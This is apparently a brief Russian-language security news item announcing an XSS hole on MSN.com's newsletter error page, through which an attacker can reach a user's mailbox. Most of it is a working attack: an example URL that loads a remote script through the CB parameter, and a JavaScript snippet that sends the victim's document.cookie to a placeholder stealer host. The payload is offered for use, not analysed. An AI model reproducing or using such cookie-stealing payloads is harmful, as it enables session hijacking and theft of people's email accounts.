CSS уязвимость обнаружена на сайте MSN.com.
Нападающий может получить доступ к
почтовому ящику пользователя.

Пример:

http://newsletters.msn.com/hm/HMError.asp?CB=http://yourcookiestealer/stealer.js

В качестве скрипта можно использовать
например такой:

i=new/**/Image();i.src=http://his_stealer/s.php?cookie=+document.cookie;



Оставить мнение